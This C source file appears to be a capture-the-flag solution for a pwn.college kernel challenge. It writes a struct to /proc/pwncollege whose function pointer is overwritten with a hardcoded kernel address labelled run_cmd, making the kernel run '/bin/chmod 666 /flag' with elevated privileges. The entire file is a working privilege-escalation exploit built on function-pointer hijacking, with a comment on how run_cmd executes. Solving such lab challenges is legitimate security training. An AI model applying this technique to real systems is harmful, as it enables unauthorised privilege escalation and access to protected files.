#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

struct evil
{
  char buffer[256];
  int (*log_function)(const char *, ...);
} s;

int main() {
    int fd = open("/proc/pwncollege", O_WRONLY);
    strcpy(s.buffer, "/bin/chmod 666 /flag");
    s.log_function = 0xffffffff81089b30ull; // run_cmd
    // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
    write(fd, &s, sizeof(struct evil) - 1);
}